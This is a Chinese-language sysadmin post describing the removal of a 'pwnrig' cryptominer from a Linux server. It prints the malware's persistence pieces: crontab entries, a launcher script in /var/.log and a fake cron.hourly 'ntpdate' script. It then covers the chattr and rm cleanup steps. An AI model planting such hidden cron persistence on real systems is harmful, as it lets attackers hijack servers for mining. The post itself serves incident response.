背景

服务器CPU使用率50%，被两个进程占用，名称分别为
-mysql
zfsutils-md5sum

image.png

诊断

使用crontab -l查看定时任务，发现病毒文件-mysql

[root@server1 ~]# crontab -l
* * * * * /var/.log/-mysql > /dev/null <&1 2>&1 & disown
@monthly /var/.log/-mysql > /dev/null <&1 2>&1 & disown
@reboot /var/.log/-mysql > /dev/null <&1 2>&1 & disown

查看这个/var/.log/目录，发现更多病毒文件，-mysql是个脚本，内容如下

[root@server1 .log]# ll
total 2904
-rwxr-xr-x. 1 root root 1087356 Dec 17  2020 i686
-rwxr-xr-x. 1 root root     115 Dec 29 01:16 -mysql
-rwxr-xr-x. 1 root root 1878380 Feb 15  2021 x86_64
[root@server1 .log]# cat ./-mysql
#!/bin/bash
cd -- /var/.log
mkdir -- .-mysql
cp -f -- x86_64 .-mysql/-mysql
./.-mysql/-mysql -c
rm -rf -- .-mysql

查看/etc/crontab.daily目录，发现一个文件名为ntpdate

[root@server1 cron.hourly]# cat /etc/cron.hourly/ntpdate
#!/bin/bash
#
#      Start/Stop the pwnrig clock daemon
#
# chkconfig 2345 90 60
# description: sync clock (GNU System)
cp -f -r -- /bin/sysprg /usr/bin/-mysql 2>/dev/null
cd /usr/bin/ 2>/dev/null
./-mysql -c >/dev/null
rm -rf -- -mysql 2>/dev/null

/bin/sysprg创建日期与ntupdate是同一天，文件大小与x86_64相同，无疑也是个病毒文件。

清除病毒

1. 杀掉进程
2. 删除crontab -e 中的内容，但是发现无法删除

[root@server1 nps]# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.XXXXGFRvjK to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.Bw1XGv

进入到/var/spool/cron目录查看文件权限，发现被加了保护，使用lsattr去除，再编辑删除内容即可

[root@server1 cron]# lsattr ./root
----i--------e- ./root
[root@server1 cron]# chattr -ia ./root
[root@server1 cron]# crontab -e
crontab: installing new crontab

3. 清除/etc/crontab.xxx中的文件ntpdate，发现都被加了保护无法删除，同样适用lsattr进行权限去除
   注意/etc/sysconfig/ntpdate不要删除

[root@server1 /etc]# chattr -ia `find . -name "ntpdate"`
[root@server1 /etc]# rm /etc/cron.daily/ntpdate

4. 清除病毒文件

[root@server1 /var]# rm /var/.log -rf
[root@server1 /var]# chattr -ia /bin/sysprg
[root@server1 /var]# rm /bin/sysprg -rf

防范措施

禁用crontab

service crond stop
mv /var/spool/cron  /var/spool/cron_is_disabled

关联文章

云服务器中挖矿病毒的清除过程（一）
云服务器中挖矿病毒的清除过程（二）